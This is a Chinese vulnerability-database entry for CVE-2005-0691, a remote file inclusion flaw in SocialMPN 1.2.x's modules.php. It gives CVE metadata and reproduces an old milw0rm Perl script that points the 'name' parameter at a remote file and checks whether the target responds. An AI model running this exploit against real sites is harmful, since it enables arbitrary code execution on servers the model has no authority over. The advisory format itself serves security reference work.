SocialMPN ‘modules.php’ 远程文件包含漏洞

SocialMPN ‘modules.php’ 远程文件包含漏洞

漏洞ID 1108521 漏洞类型 未知
发布时间 2005-03-11 更新时间 2005-03-11
图片[1]-SocialMPN ‘modules.php’ 远程文件包含漏洞-安全小百科CVE编号 CVE-2005-0691
图片[2]-SocialMPN ‘modules.php’ 远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200503-050
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/872
https://www.securityfocus.com/bid/90191
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-050
|漏洞详情
SocialMPN的modules.phparticle模式中存在PHP远程文件包含漏洞,远程攻击者可以通过修改name参数以引用含有该代码的远程Web服务器的URL来执行任意PHP代码。
|漏洞EXP
#!/usr/bin/perl -w
 
# Remote Testing SocialMPN Remote File Inclusion by y3dips [for testing only]
# Bug find by zer0-c00l ,
# Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html

print " * Remote Testing File Inclusion for SocialMPN by y3dips *n";

require LWP::UserAgent;

if(@ARGV == 2)
        {
      
$target= $ARGV[0];
$xploit= $ARGV[1];


my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target/modules.php?name=$xploit&file=article&sid=2";
# just for trick , use "?" in the last char of your file inclusion path

my $injek = $ua->get($url);

            print " -------------------------------n";
   if ($injek->is_success)
   {
      $injekcek = $injek->as_string;
        if ($injekcek =~ /(HTTP/1.0 200 OK)/)
        { print("n This Site Maybe Vulnerable n"); }
      else
        {die $injek->status_line;}
            print " -------------------------------n";
        }
   }

else{
print "Use: perl $0 [target] [xplo.txt] n";
}

# milw0rm.com [2005-03-11]
|受影响的产品
SocialMPN SocialMPN 1.2.5

SocialMPN SocialMPN 1.2.4

SocialMPN SocialMPN 1.2.3

SocialMPN SocialMPN 1.2.2

SocialMPN SocialMPN 1.2.1

|参考资料

来源:MISC
链接:http://waraxe.us/ftopic-542-0-days0-orderasc-.html
来源:BUGTRAQ
名称:20050307RemoteTestingSocialMPNRemoteFileInclusionbyy3dips
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111022633903239&w;=2

相关推荐: Netgear WG602 Wireless Access Point Default Backdoor Account Vulnerability

Netgear WG602 Wireless Access Point Default Backdoor Account Vulnerability 漏洞ID 1098449 漏洞类型 Design Error 发布时间 2004-06-03 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享